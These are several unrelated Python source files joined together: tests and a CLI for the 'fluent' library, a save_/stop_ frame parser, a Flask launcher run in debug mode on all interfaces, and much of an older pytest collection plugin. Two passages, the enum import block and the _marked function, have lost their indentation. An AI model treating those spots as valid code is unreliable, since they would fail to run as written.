        expect(_([['foo'], ['bar']]).map(_.each[0])) == ('foo', 'bar')
    def test_should_produce_callable_on_binary_operator(self):
        expect(_(['foo', 'bar']).map(_.each == 'foo')) == (True, False)
        expect(_([3, 5]).map(_.each + 3)) == (6, 8)
        expect(_([3, 5]).map(_.each < 4)) == (True, False)
    def test_should_produce_callable_on_unary_operator(self):
        expect(_([3, 5]).map(- _.each)) == (-3, -5)
        expect(_([3, 5]).map(~ _.each)) == (-4, -6)
    def test_should_produce_methodcaller_on_call_attribute(self):
        # problem: _.each.call is now not an attrgetter
        # _.each.method.call('foo') # like a method chaining
        # _.each_call.method('foo')
        # _.eachcall.method('foo')
        class Tested(object):
            def method(self, arg): return 'method+'+arg
        expect(_(Tested()).call(_.each.call.method('argument'))) == 'method+argument'
        expect(lambda: _.each.call('argument')).to_raise(AssertionError, '_.each.call.method_name')
class IntegrationTest(FluentTest):
    """End-to-end scenarios: scraping a line and running the module as a CLI."""
    def test_extrac_and_decode_URIs(self):
        from xml.sax.saxutils import unescape
        line = '''<td><img src='/sitefiles/star_5.png' height='15' width='75' alt=''></td>
                <td><input style='width:200px; outline:none; border-style:solid; border-width:1px; border-color:#ccc;' type='text' id='ydxerpxkpcfqjaybcssw' readonly='readonly' onClick="select_text('ydxerpxkpcfqjaybcssw');" value='http://list.iblocklist.com/?list=ydxerpxkpcfqjaybcssw&fileformat=p2p&archiveformat=gz'></td>'''
        actual = _(line).findall(r'value=\'(.*)\'').imap(unescape).call(list)
        expect(actual) == ['http://list.iblocklist.com/?list=ydxerpxkpcfqjaybcssw&fileformat=p2p&archiveformat=gz']
    def test_call_module_from_shell(self):
        from subprocess import check_output
        output = check_output(
            ['python', '-m', 'fluent', "lib.sys.stdin.read().split('\\n').imap(str.upper).imap(print).call(list)"],
            input=b'foo\nbar\nbaz')
        expect(output) == b'FOO\nBAR\nBAZ\n'
if __name__ == '__main__':
    import sys
    assert len(sys.argv) == 2, \
        "Usage: python -m fluent 'some code that can access fluent functions without having to import them'"
    # Execute the one-liner with wrap/_/lib pre-bound so no imports are needed.
    # NOTE(review): exec of user-supplied code is the whole point of this CLI,
    # but never feed it untrusted input.
    exec(sys.argv[1], dict(wrap=wrap, _=_, lib=lib))
|
from collections import OrderedDict as odict
from values import decode_kv_pairs, encode_kv_pairs
from loops import decode_loops, encode_loops
def split_frames(lines):
    '''
    Splits a list of lines into lines that are not part of a frame,
    and a mapping from frame name to the lines of that frame.
    Frames start with a `save_<name>` line and end with a `stop_` line. They
    also end with the next data block, but this function is only called
    with lines from a single data block.

    Returns an (outer_lines, frames) tuple where frames is an OrderedDict
    that preserves the order in which frames first appear.
    '''
    def parse_frame_name(line, prefix='save_'):
        # The frame name is the first token with its `save_` prefix removed.
        return line.split()[0][len(prefix):]
    def frame_starts(line):
        return line.startswith('save_')
    def frame_stops(line):
        return line.startswith('stop_')
    outer = []
    frame = None
    frames = odict()
    for line in lines:
        if frame_stops(line):
            frame = None
        elif frame_starts(line):
            # BUGFIX: parse_frame_name used to take only the line, so this
            # two-argument call raised TypeError on every frame start; the
            # prefix is now an explicit (defaulted) parameter.
            name = parse_frame_name(line, 'save_')
            if name not in frames:
                frames[name] = []
            frame = frames[name]
        elif frame is None:
            outer.append(line)
        else:
            frame.append(line)
    return outer, frames
def decode_frames(lines):
    """Split *lines* into outer lines and frames, decoding each frame in place."""
    outer, frames = split_frames(lines)
    for name, frame_lines in list(frames.items()):
        frames[name] = decode_frame(frame_lines)
    return outer, frames
def decode_frame(lines):
    """Decode one frame: its key/value pairs merged with its decoded loops."""
    remaining, loops = decode_loops(lines)
    frame = decode_kv_pairs(remaining)
    frame.update(loops)
    return frame
def encode_frames(block):
    """Encode every dict-valued entry of *block* as a save_/stop_ frame."""
    frame_items = ((key, block[key]) for key in block if isinstance(block[key], dict))
    lines = []
    for name, frame in frame_items:
        lines.append('save_%s' % name)
        lines.append(encode_frame(frame))
        lines.append('stop_')
    return '\n'.join(lines)
def encode_frame(frame):
    """Encode one frame as its key/value pairs followed by its loops."""
    parts = [encode_kv_pairs(frame), encode_loops(frame)]
    return '\n'.join(parts)
|
from lighthouse import app
if __name__ == '__main__':
    # NOTE(review): binds to all interfaces with the debug reloader enabled -
    # fine for local development, do not run like this in production.
    app.run(host='0.0.0.0', debug=True)
|
""" Python test discovery, setup and run of test functions. """
import re
import fnmatch
import functools
import py
import inspect
import sys
import pytest
from _pytest.mark import MarkDecorator, MarkerError
from py._code.code import TerminalRepr
try:
import enum
except ImportError: # pragma: no cover
# Only available in Python 3.4+ or as a backport
enum = None
import _pytest
import pluggy
# Directories used by filter_traceback() to cut internal frames from tracebacks.
cutdir2 = py.path.local(_pytest.__file__).dirpath()
cutdir1 = py.path.local(pluggy.__file__.rstrip("oc"))  # strip trailing c/o: .pyc/.pyo -> .py
NoneType = type(None)
# Sentinel for "no value given" in places where None is a legal value.
NOTSET = object()
isfunction = inspect.isfunction
isclass = inspect.isclass
callable = py.builtin.callable
# Python 2 cleared the current exception explicitly; falls back to a no-op where sys.exc_clear is absent.
exc_clear = getattr(sys, 'exc_clear', lambda: None)
REGEX_TYPE = type(re.compile(''))
def filter_traceback(entry):
    # Keep only traceback entries from user code: not the pluggy module file
    # (cutdir1) and not anywhere inside the _pytest package (cutdir2).
    return entry.path != cutdir1 and not entry.path.relto(cutdir2)
def get_real_func(obj):
    """Return the innermost function behind functools.wraps / functools.partial
    wrappers of *obj*.
    """
    # Follow the __wrapped__ chain left behind by functools.wraps first ...
    while hasattr(obj, "__wrapped__"):
        obj = obj.__wrapped__
    # ... then peel off a single functools.partial layer, if present.
    return obj.func if isinstance(obj, functools.partial) else obj
def getfslineno(obj):
    """Return the (filesystem path, line number) where *obj* is defined."""
    # xxx let decorators etc specify a sane ordering
    obj = get_real_func(obj)
    # `place_as` lets an object report itself at another object's location.
    if hasattr(obj, 'place_as'):
        obj = obj.place_as
    fslineno = py.code.getfslineno(obj)
    assert isinstance(fslineno[1], int), obj
    return fslineno
def getimfunc(func):
    """Return the plain function underlying a bound method, or *func* itself.

    Tries the Python 3 attribute (__func__) first, then the Python 2 one
    (im_func); plain functions come back unchanged.
    """
    for attribute in ('__func__', 'im_func'):
        try:
            return getattr(func, attribute)
        except AttributeError:
            pass
    return func
def safe_getattr(object, name, default):
    """Like getattr but return *default* upon any Exception.
    Attribute access can potentially fail for 'evil' Python objects
    (e.g. raising properties). See issue214.
    """
    try:
        value = getattr(object, name, default)
    except Exception:
        value = default
    return value
class FixtureFunctionMarker:
    """Record of the arguments given to @pytest.fixture.

    Applied as a decorator it tags the fixture function via the
    _pytestfixturefunction attribute, through which pytest later finds it.
    """
    def __init__(self, scope, params,
                 autouse=False, yieldctx=False, ids=None):
        self.scope = scope
        self.params = params
        self.autouse = autouse
        self.yieldctx = yieldctx
        self.ids = ids
    def __call__(self, function):
        # Classes cannot act as fixtures; fail loudly rather than misbehave later.
        if not isclass(function):
            function._pytestfixturefunction = self
            return function
        raise ValueError(
            "class fixtures not supported (may be in the future)")
def fixture(scope="function", params=None, autouse=False, ids=None):
    """ (return a) decorator to mark a fixture factory function.
    This decorator can be used (with or without parameters) to define
    a fixture function. The name of the fixture function can later be
    referenced to cause its invocation ahead of running tests: test
    modules or classes can use the pytest.mark.usefixtures(fixturename)
    marker. Test functions can directly use fixture names as input
    arguments in which case the fixture instance returned from the fixture
    function will be injected.
    :arg scope: the scope for which this fixture is shared, one of
                "function" (default), "class", "module", "session".
    :arg params: an optional list of parameters which will cause multiple
                invocations of the fixture function and all of the tests
                using it.
    :arg autouse: if True, the fixture func is activated for all tests that
                can see it. If False (the default) then an explicit
                reference is needed to activate the fixture.
    :arg ids: list of string ids each corresponding to the params
       so that they are part of the test id. If no ids are provided
       they will be generated automatically from the params.
    """
    # Bare usage (`@fixture` without parentheses) puts the function itself
    # into the scope parameter - decorate it directly with the defaults.
    if callable(scope) and params is None and autouse == False:
        # direct decoration
        return FixtureFunctionMarker(
                "function", params, autouse)(scope)
    # Normalize arbitrary iterables of params to a list.
    if params is not None and not isinstance(params, (list, tuple)):
        params = list(params)
    return FixtureFunctionMarker(scope, params, autouse, ids=ids)
def yield_fixture(scope="function", params=None, autouse=False, ids=None):
    """ (return a) decorator to mark a yield-fixture factory function
    (EXPERIMENTAL).
    This takes the same arguments as :py:func:`pytest.fixture` but
    expects a fixture function to use a ``yield`` instead of a ``return``
    statement to provide a fixture. See
    http://pytest.org/en/latest/yieldfixture.html for more info.
    """
    # Bare usage (`@yield_fixture` without parentheses) puts the function
    # itself into the scope parameter - decorate it directly with defaults.
    if callable(scope) and params is None and autouse == False:
        # direct decoration
        return FixtureFunctionMarker(
                "function", params, autouse, yieldctx=True)(scope)
    else:
        return FixtureFunctionMarker(scope, params, autouse,
                                     yieldctx=True, ids=ids)
# Marker applied to fixtures discovered via the legacy funcarg prefix.
defaultfuncargprefixmarker = fixture()
def pyobj_property(name):
    """Build a property that returns the closest parent collector node of the
    pytest collector class named *name* (e.g. 'Module'), or None if absent."""
    def get(self):
        node = self.getparent(getattr(pytest, name))
        if node is not None:
            return node.obj
    doc = "python %s object this node was collected from (can be None)." % (
        name.lower(),)
    return property(get, None, None, doc)
def pytest_addoption(parser):
    """Register this plugin's command line options and ini settings."""
    group = parser.getgroup("general")
    group.addoption('--fixtures', '--funcargs',
               action="store_true", dest="showfixtures", default=False,
               help="show available fixtures, sorted by plugin appearance")
    parser.addini("usefixtures", type="args", default=[],
        help="list of default fixtures to be used with this project")
    parser.addini("python_files", type="args",
        default=['test_*.py', '*_test.py'],
        help="glob-style file patterns for Python test module discovery")
    parser.addini("python_classes", type="args", default=["Test",],
        help="prefixes or glob names for Python test class discovery")
    parser.addini("python_functions", type="args", default=["test",],
        help="prefixes or glob names for Python test function and "
             "method discovery")
def pytest_cmdline_main(config):
    # --fixtures short-circuits the normal test run: show them and exit 0.
    if config.option.showfixtures:
        showfixtures(config)
        return 0
def pytest_generate_tests(metafunc):
    """Expand @pytest.mark.parametrize markers found on the test function."""
    # these misspellings are common - raise a specific error to alert the user
    for wrong in ('parameterize', 'parametrise', 'parameterise'):
        if hasattr(metafunc.function, wrong):
            raise MarkerError(
                "{0} has '{1}', spelling should be 'parametrize'".format(
                    metafunc.function.__name__, wrong))
    markers = getattr(metafunc.function, 'parametrize', None)
    if markers is None:
        # function was not marked with @parametrize at all
        return
    for marker in markers:
        metafunc.parametrize(*marker.args, **marker.kwargs)
def pytest_configure(config):
    """Document the markers this plugin understands (shown by --markers)."""
    parametrize_doc = (
        "parametrize(argnames, argvalues): call a test function multiple "
        "times passing in different arguments in turn. argvalues generally "
        "needs to be a list of values if argnames specifies only one name "
        "or a list of tuples of values if argnames specifies multiple names. "
        "Example: @parametrize('arg1', [1,2]) would lead to two calls of the "
        "decorated test function, one with arg1=1 and another with arg1=2."
        "see http://pytest.org/latest/parametrize.html for more info and "
        "examples."
    )
    usefixtures_doc = (
        "usefixtures(fixturename1, fixturename2, ...): mark tests as needing "
        "all of the specified fixtures. see http://pytest.org/latest/fixture.html#usefixtures "
    )
    for marker_doc in (parametrize_doc, usefixtures_doc):
        config.addinivalue_line("markers", marker_doc)
def pytest_sessionstart(session):
    """Attach a FixtureManager to the freshly started session."""
    session._fixturemanager = FixtureManager(session)
@pytest.hookimpl(trylast=True)
def pytest_namespace():
    """Expose this plugin's public helpers in the ``pytest`` namespace."""
    # give pytest.raises an .Exception attribute mirroring pytest.fail
    raises.Exception = pytest.fail.Exception
    namespace = {
        'fixture': fixture,
        'yield_fixture': yield_fixture,
        'raises': raises,
    }
    namespace['collect'] = {
        'Module': Module,
        'Class': Class,
        'Instance': Instance,
        'Function': Function,
        'Generator': Generator,
        '_fillfuncargs': fillfixtures,
    }
    return namespace
@fixture(scope="session")
def pytestconfig(request):
    """ the pytest config object with access to command line opts."""
    # session-scoped: one config object serves the whole test run
    return request.config
@pytest.hookimpl(trylast=True)
def pytest_pyfunc_call(pyfuncitem):
    """Default (trylast) implementation: actually call the test function."""
    testfunction = pyfuncitem.obj
    if pyfuncitem._isyieldedfunction():
        # deprecated yield-generated test: call with the stored positional args
        testfunction(*pyfuncitem._args)
    else:
        # pass exactly the fixtures named in the function's signature
        kwargs = dict((argname, pyfuncitem.funcargs[argname])
                      for argname in pyfuncitem._fixtureinfo.argnames)
        testfunction(**kwargs)
    return True
def pytest_collect_file(path, parent):
    """Collect .py files matching the python_files patterns as Modules."""
    if path.ext != ".py":
        return
    if not parent.session.isinitpath(path):
        # files given directly on the command line bypass the pattern check
        patterns = parent.config.getini('python_files')
        if not any(path.fnmatch(pat) for pat in patterns):
            return
    ihook = parent.session.gethookproxy(path)
    return ihook.pytest_pycollect_makemodule(path=path, parent=parent)
def pytest_pycollect_makemodule(path, parent):
    """Default module factory: wrap *path* in a plain Module collector."""
    return Module(path, parent)
@pytest.hookimpl(hookwrapper=True)
def pytest_pycollect_makeitem(collector, name, obj):
    # Hook wrapper: let all other implementations run first; only when none
    # of them produced a node do we apply the default python rules below.
    outcome = yield
    res = outcome.get_result()
    if res is not None:
        # another plugin already collected this object - stop the wrapper
        raise StopIteration
    # nothing was collected elsewhere, let's do it here
    if isclass(obj):
        if collector.istestclass(obj, name):
            Class = collector._getcustomclass("Class")
            outcome.force_result(Class(name, parent=collector))
    elif collector.istestfunction(obj, name):
        # mock seems to store unbound methods (issue473), normalize it
        obj = getattr(obj, "__func__", obj)
        if not isfunction(obj):
            # warn but still fall through; __test__ may veto collection below
            collector.warn(code="C2", message=
                "cannot collect %r because it is not a function."
                % name, )
        if getattr(obj, "__test__", True):
            if is_generator(obj):
                # deprecated yield-based test: collect as a Generator node
                res = Generator(name, parent=collector)
            else:
                # may expand into several Function items via parametrization
                res = list(collector._genfunctions(name, obj))
            outcome.force_result(res)
def is_generator(func):
    """Return truthy when *func*'s code object carries the generator flag.

    Builtins have no bytecode, so they are assumed not to be generators.
    """
    CO_GENERATOR = 32  # generator-function flag on code objects
    try:
        rawcode = py.code.getrawcode(func)
    except AttributeError:  # builtin functions have no bytecode
        return False
    return rawcode.co_flags & CO_GENERATOR
class PyobjContext(object):
    # Convenience accessors walking up the collection tree: each returns
    # the nearest parent node's underlying python object or None
    # (see pyobj_property).
    module = pyobj_property("Module")
    cls = pyobj_property("Class")
    instance = pyobj_property("Instance")
class PyobjMixin(PyobjContext):
    # "obj" is built via a throwaway function so fget/fset do not leak into
    # the class namespace; the call right below replaces the function with
    # the resulting property.
    def obj():
        def fget(self):
            try:
                return self._obj
            except AttributeError:
                # compute and cache the underlying object on first access
                self._obj = obj = self._getobj()
                return obj
        def fset(self, value):
            self._obj = value
        return property(fget, fset, None, "underlying python object")
    obj = obj()
    def _getobj(self):
        # default strategy: look our name up on the parent's python object
        return getattr(self.parent.obj, self.name)
    def getmodpath(self, stopatmodule=True, includemodule=False):
        """ return python path relative to the containing module. """
        chain = self.listchain()
        chain.reverse()
        parts = []
        for node in chain:
            if isinstance(node, Instance):
                # the "()" instance node contributes nothing to the path
                continue
            name = node.name
            if isinstance(node, Module):
                assert name.endswith(".py")
                name = name[:-3]
                if stopatmodule:
                    if includemodule:
                        parts.append(name)
                    break
            parts.append(name)
        parts.reverse()
        s = ".".join(parts)
        # turn "func.[id]" into "func[id]" for parametrized entries
        return s.replace(".[", "[")
    def _getfslineno(self):
        return getfslineno(self.obj)
    def reportinfo(self):
        # return (fspath, lineno, domain-path) used for reporting/sorting
        # XXX caching?
        obj = self.obj
        if hasattr(obj, 'compat_co_firstlineno'):
            # nose compatibility
            fspath = sys.modules[obj.__module__].__file__
            if fspath.endswith(".pyc"):
                fspath = fspath[:-1]
            lineno = obj.compat_co_firstlineno
        else:
            fspath, lineno = getfslineno(obj)
        modpath = self.getmodpath()
        assert isinstance(lineno, int)
        return fspath, lineno, modpath
class PyCollector(PyobjMixin, pytest.Collector):
    # Shared collection logic for Module/Class/Instance collectors.
    def funcnamefilter(self, name):
        # does *name* look like a test function per the python_functions ini?
        return self._matches_prefix_or_glob_option('python_functions', name)
    def isnosetest(self, obj):
        """ Look for the __test__ attribute, which is applied by the
        @nose.tools.istest decorator
        """
        return safe_getattr(obj, '__test__', False)
    def classnamefilter(self, name):
        # does *name* look like a test class per the python_classes ini?
        return self._matches_prefix_or_glob_option('python_classes', name)
    def istestfunction(self, obj, name):
        # must match the naming rules, be callable, and not itself be a
        # fixture factory (fixtures are collected separately)
        return (
            (self.funcnamefilter(name) or self.isnosetest(obj))
            and safe_getattr(obj, "__call__", False) and getfixturemarker(obj) is None
        )
    def istestclass(self, obj, name):
        return self.classnamefilter(name) or self.isnosetest(obj)
    def _matches_prefix_or_glob_option(self, option_name, name):
        """
        checks if the given name matches the prefix or glob-pattern defined
        in ini configuration.
        """
        for option in self.config.getini(option_name):
            if name.startswith(option):
                return True
            # check that name looks like a glob-string before calling fnmatch
            # because this is called for every name in each collected module,
            # and fnmatch is somewhat expensive to call
            elif ('*' in option or '?' in option or '[' in option) and \
                    fnmatch.fnmatch(name, option):
                return True
        return False
    def collect(self):
        if not getattr(self.obj, "__test__", True):
            return []
        # NB. we avoid random getattrs and peek in the __dict__ instead
        # (XXX originally introduced from a PyPy need, still true?)
        dicts = [getattr(self.obj, '__dict__', {})]
        for basecls in inspect.getmro(self.obj.__class__):
            dicts.append(basecls.__dict__)
        seen = {}
        l = []
        for dic in dicts:
            for name, obj in dic.items():
                if name in seen:
                    # a name defined closer to the object wins over bases
                    continue
                seen[name] = True
                res = self.makeitem(name, obj)
                if res is None:
                    continue
                if not isinstance(res, list):
                    res = [res]
                l.extend(res)
        # sort collected items by (fspath, lineno), i.e. source order
        l.sort(key=lambda item: item.reportinfo()[:2])
        return l
    def makeitem(self, name, obj):
        #assert self.ihook.fspath == self.fspath, self
        # delegate item creation to the pytest_pycollect_makeitem hook
        return self.ihook.pytest_pycollect_makeitem(
            collector=self, name=name, obj=obj)
    def _genfunctions(self, name, funcobj):
        # Yield Function items for *funcobj*, expanding parametrization.
        module = self.getparent(Module).obj
        clscol = self.getparent(Class)
        cls = clscol and clscol.obj or None
        transfer_markers(funcobj, cls, module)
        fm = self.session._fixturemanager
        fixtureinfo = fm.getfixtureinfo(self, funcobj, cls)
        metafunc = Metafunc(funcobj, fixtureinfo, self.config,
                            cls=cls, module=module)
        # run module- and class-level pytest_generate_tests implementations
        # in addition to the globally registered hook implementations
        methods = []
        if hasattr(module, "pytest_generate_tests"):
            methods.append(module.pytest_generate_tests)
        if hasattr(cls, "pytest_generate_tests"):
            methods.append(cls().pytest_generate_tests)
        if methods:
            self.ihook.pytest_generate_tests.call_extra(methods,
                dict(metafunc=metafunc))
        else:
            self.ihook.pytest_generate_tests(metafunc=metafunc)
        Function = self._getcustomclass("Function")
        if not metafunc._calls:
            yield Function(name, parent=self, fixtureinfo=fixtureinfo)
        else:
            # add funcargs() as fixturedefs to fixtureinfo.arg2fixturedefs
            add_funcarg_pseudo_fixture_def(self, metafunc, fm)
            for callspec in metafunc._calls:
                subname = "%s[%s]" %(name, callspec.id)
                yield Function(name=subname, parent=self,
                               callspec=callspec, callobj=funcobj,
                               fixtureinfo=fixtureinfo,
                               keywords={callspec.id:True})
def add_funcarg_pseudo_fixture_def(collector, metafunc, fixturemanager):
    """Turn direct funcarg parametrization into artificial FixtureDefs."""
    # this function will transform all collected calls to a functions
    # if they use direct funcargs (i.e. direct parametrization)
    # because we want later test execution to be able to rely on
    # an existing FixtureDef structure for all arguments.
    # XXX we can probably avoid this algorithm if we modify CallSpec2
    # to directly care for creating the fixturedefs within its methods.
    if not metafunc._calls[0].funcargs:
        return # this function call does not have direct parametrization
    # collect funcargs of all callspecs into a list of values
    arg2params = {}
    arg2scope = {}
    for callspec in metafunc._calls:
        for argname, argvalue in callspec.funcargs.items():
            assert argname not in callspec.params
            # move the value into params so it is served via request.param
            callspec.params[argname] = argvalue
            arg2params_list = arg2params.setdefault(argname, [])
            # remember the value's index into the per-argname value list
            callspec.indices[argname] = len(arg2params_list)
            arg2params_list.append(argvalue)
            if argname not in arg2scope:
                scopenum = callspec._arg2scopenum.get(argname,
                                                      scopenum_function)
                arg2scope[argname] = scopes[scopenum]
        callspec.funcargs.clear()
    # register artificial FixtureDef's so that later at test execution
    # time we can rely on a proper FixtureDef to exist for fixture setup.
    arg2fixturedefs = metafunc._arg2fixturedefs
    for argname, valuelist in arg2params.items():
        # if we have a scope that is higher than function we need
        # to make sure we only ever create an according fixturedef on
        # a per-scope basis. We thus store and cache the fixturedef on the
        # node related to the scope.
        scope = arg2scope[argname]
        node = None
        if scope != "function":
            node = get_scope_node(collector, scope)
            if node is None:
                assert scope == "class" and isinstance(collector, Module)
                # use module-level collector for class-scope (for now)
                node = collector
        if node and argname in node._name2pseudofixturedef:
            arg2fixturedefs[argname] = [node._name2pseudofixturedef[argname]]
        else:
            # the trailing False, False are the unittest/yieldctx flags
            fixturedef = FixtureDef(fixturemanager, '', argname,
                                    get_direct_param_fixture_func,
                                    arg2scope[argname],
                                    valuelist, False, False)
            arg2fixturedefs[argname] = [fixturedef]
            if node is not None:
                node._name2pseudofixturedef[argname] = fixturedef
def get_direct_param_fixture_func(request):
    """Fixture function backing pseudo fixturedefs: hand back the param."""
    param = request.param
    return param
class FuncFixtureInfo:
    """Fixture bookkeeping for one test function.

    argnames: fixture names taken directly from the function signature.
    names_closure: transitive closure of all required fixture names.
    name2fixturedefs: mapping of fixture name to its FixtureDef list.
    """
    def __init__(self, argnames, names_closure, name2fixturedefs):
        self.argnames, self.names_closure, self.name2fixturedefs = (
            argnames, names_closure, name2fixturedefs)
def _marked(func, mark):
""" Returns True if :func: is already marked with :mark:, False otherwise.
This can happen if marker is applied to class and the test file is
invoked more than once.
"""
try:
func_mark = getattr(func, mark.name)
except AttributeError:
return False
return mark.args == func_mark.args and mark.kwargs == func_mark.kwargs
def transfer_markers(funcobj, cls, mod):
    """Apply class- and module-level ``pytestmark`` marks to *funcobj*."""
    # XXX this should rather be code in the mark plugin or the mark
    # plugin should merge with the python plugin.
    for holder in (cls, mod):
        try:
            marks = holder.pytestmark
        except AttributeError:
            continue
        # pytestmark may be a single mark or a list of marks
        if not isinstance(marks, list):
            marks = [marks]
        for mark in marks:
            if not _marked(funcobj, mark):
                mark(funcobj)
class Module(pytest.File, PyCollector):
    """ Collector for test classes and functions. """
    def _getobj(self):
        # import the module once and memoize the result on the node
        return self._memoizedcall('_obj', self._importtestmodule)
    def collect(self):
        # register module-level fixtures before collecting any items
        self.session._fixturemanager.parsefactories(self)
        return super(Module, self).collect()
    def _importtestmodule(self):
        # we assume we are only called once per module
        try:
            mod = self.fspath.pyimport(ensuresyspath="append")
        except SyntaxError:
            # show a short traceback for syntax errors in test modules
            raise self.CollectError(
                py.code.ExceptionInfo().getrepr(style="short"))
        except self.fspath.ImportMismatchError:
            e = sys.exc_info()[1]
            raise self.CollectError(
                "import file mismatch:\n"
                "imported module %r has this __file__ attribute:\n"
                "  %s\n"
                "which is not the same as the test file we want to collect:\n"
                "  %s\n"
                "HINT: remove __pycache__ / .pyc files and/or use a "
                "unique basename for your test file modules"
                 % e.args
            )
        #print "imported test module", mod
        self.config.pluginmanager.consider_module(mod)
        return mod
    def setup(self):
        # xunit-style module setup; unittest's setUpModule spelling wins
        setup_module = xunitsetup(self.obj, "setUpModule")
        if setup_module is None:
            setup_module = xunitsetup(self.obj, "setup_module")
        if setup_module is not None:
            #XXX: nose compat hack, move to nose plugin
            # if it takes a positional arg, its probably a pytest style one
            # so we pass the current module object
            if inspect.getargspec(setup_module)[0]:
                setup_module(self.obj)
            else:
                setup_module()
        fin = getattr(self.obj, 'tearDownModule', None)
        if fin is None:
            fin = getattr(self.obj, 'teardown_module', None)
        if fin is not None:
            #XXX: nose compat hack, move to nose plugin
            # if it takes a positional arg, it's probably a pytest style one
            # so we pass the current module object
            if inspect.getargspec(fin)[0]:
                finalizer = lambda: fin(self.obj)
            else:
                finalizer = fin
            self.addfinalizer(finalizer)
class Class(PyCollector):
    """ Collector for test methods. """
    def collect(self):
        """Return a single Instance node, unless the class has __init__."""
        if hasinit(self.obj):
            self.warn("C1", "cannot collect test class %r because it has a "
                      "__init__ constructor" % self.obj.__name__)
            return []
        Instance = self._getcustomclass("Instance")
        return [Instance(name="()", parent=self)]
    def setup(self):
        """Run xunit-style setup_class and schedule teardown_class."""
        setup_class = xunitsetup(self.obj, 'setup_class')
        if setup_class is not None:
            # unwrap method wrappers (py2 im_func / py3 __func__) so the
            # class object can be passed explicitly
            setup_class = getattr(setup_class, 'im_func', setup_class)
            setup_class = getattr(setup_class, '__func__', setup_class)
            setup_class(self.obj)
        teardown = getattr(self.obj, 'teardown_class', None)
        if teardown is not None:
            teardown = getattr(teardown, 'im_func', teardown)
            teardown = getattr(teardown, '__func__', teardown)
            self.addfinalizer(lambda: teardown(self.obj))
class Instance(PyCollector):
    """Collector node representing one instantiated test class."""
    def _getobj(self):
        # instantiate the class collected by our parent Class node
        return self.parent.obj()
    def collect(self):
        # register instance-level fixtures before collecting methods
        self.session._fixturemanager.parsefactories(self)
        return super(Instance, self).collect()
    def newinstance(self):
        """Create a fresh instance of the test class and cache it as .obj."""
        self.obj = self._getobj()
        return self.obj
class FunctionMixin(PyobjMixin):
    """ mixin for the code common to Function and Generator.
    """
    def setup(self):
        """ perform setup for this test function. """
        if hasattr(self, '_preservedparent'):
            # set by Generator.collect() to reuse the original parent object
            obj = self._preservedparent
        elif isinstance(self.parent, Instance):
            # each test method gets a freshly created class instance
            obj = self.parent.newinstance()
            self.obj = self._getobj()
        else:
            obj = self.parent.obj
        if inspect.ismethod(self.obj):
            setup_name = 'setup_method'
            teardown_name = 'teardown_method'
        else:
            setup_name = 'setup_function'
            teardown_name = 'teardown_function'
        setup_func_or_method = xunitsetup(obj, setup_name)
        if setup_func_or_method is not None:
            setup_func_or_method(self.obj)
        fin = getattr(obj, teardown_name, None)
        if fin is not None:
            self.addfinalizer(lambda: fin(self.obj))
    def _prunetraceback(self, excinfo):
        # trim traceback entries to the frames inside the test function,
        # unless --fulltrace was requested
        if hasattr(self, '_obj') and not self.config.option.fulltrace:
            code = py.code.Code(get_real_func(self.obj))
            path, firstlineno = code.path, code.firstlineno
            traceback = excinfo.traceback
            ntraceback = traceback.cut(path=path, firstlineno=firstlineno)
            if ntraceback == traceback:
                # cutting at the exact line failed; retry by path only,
                # then by generic filtering, keeping the full traceback
                # as a last resort
                ntraceback = ntraceback.cut(path=path)
                if ntraceback == traceback:
                    #ntraceback = ntraceback.cut(excludepath=cutdir2)
                    ntraceback = ntraceback.filter(filter_traceback)
                    if not ntraceback:
                        ntraceback = traceback
            excinfo.traceback = ntraceback.filter()
            # issue364: mark all but first and last frames to
            # only show a single-line message for each frame
            if self.config.option.tbstyle == "auto":
                if len(excinfo.traceback) > 2:
                    for entry in excinfo.traceback[1:-1]:
                        entry.set_repr_style('short')
    def _repr_failure_py(self, excinfo, style="long"):
        # pytest.fail(..., pytrace=False) renders just the message
        if excinfo.errisinstance(pytest.fail.Exception):
            if not excinfo.value.pytrace:
                return str(excinfo.value)
        return super(FunctionMixin, self)._repr_failure_py(excinfo,
            style=style)
    def repr_failure(self, excinfo, outerr=None):
        assert outerr is None, "XXX outerr usage is deprecated"
        style = self.config.option.tbstyle
        if style == "auto":
            style = "long"
        return self._repr_failure_py(excinfo, style=style)
class Generator(FunctionMixin, PyCollector):
    # Collector for the deprecated yield-based test generators.
    def collect(self):
        # test generators are seen as collectors but they also
        # invoke setup/teardown on popular request
        # (induced by the common "test_*" naming shared with normal tests)
        self.session._setupstate.prepare(self)
        # see FunctionMixin.setup and test_setupstate_is_preserved_134
        self._preservedparent = self.parent.obj
        l = []
        seen = {}
        for i, x in enumerate(self.obj()):
            name, call, args = self.getcallargs(x)
            if not callable(call):
                raise TypeError("%r yielded non callable test %r" %(self.obj, call,))
            if name is None:
                name = "[%d]" % i
            else:
                name = "['%s']" % name
            if name in seen:
                raise ValueError("%r generated tests with non-unique name %r" %(self, name))
            seen[name] = True
            l.append(self.Function(name, self, args=args, callobj=call))
        return l
    def getcallargs(self, obj):
        # A yielded item may be a bare callable, a (callable, args...)
        # tuple, or a (name, callable, args...) tuple.
        if not isinstance(obj, (tuple, list)):
            obj = (obj,)
        # explict naming
        if isinstance(obj[0], py.builtin._basestring):
            name = obj[0]
            obj = obj[1:]
        else:
            name = None
        call, args = obj[0], obj[1:]
        return name, call, args
def hasinit(obj):
    """Return True if *obj* defines its own __init__ (not object's).

    Falls through (returning None) when no custom __init__ is present,
    which callers treat as falsy.
    """
    init = getattr(obj, '__init__', None)
    if init and init != object.__init__:
        return True
def fillfixtures(function):
    """ fill missing funcargs for a test function. """
    try:
        request = function._request
    except AttributeError:
        # XXX this special code path is only expected to execute
        # with the oejskit plugin. It uses classes with funcargs
        # and we thus have to work a bit to allow this.
        fm = function.session._fixturemanager
        fi = fm.getfixtureinfo(function.parent, function.obj, None)
        function._fixtureinfo = fi
        request = function._request = FixtureRequest(function)
        request._fillfixtures()
        # prune out funcargs for jstests
        newfuncargs = {}
        for name in fi.argnames:
            newfuncargs[name] = function.funcargs[name]
        function.funcargs = newfuncargs
    else:
        # normal path: the Function item already carries a FixtureRequest
        request._fillfixtures()
# sentinel: distinguishes "argument not provided" from an explicit None
_notexists = object()
class CallSpec2(object):
    # One concrete parameter combination ("call") of a test function, as
    # accumulated by Metafunc.parametrize() / Metafunc.addcall().
    def __init__(self, metafunc):
        self.metafunc = metafunc
        # direct (non-fixture) argument values, keyed by argname
        self.funcargs = {}
        # id fragments; joined with "-" by the .id property
        self._idlist = []
        # fixture parameters, served to fixtures via request.param
        self.params = {}
        self._globalid = _notexists
        self._globalid_args = set()
        self._globalparam = _notexists
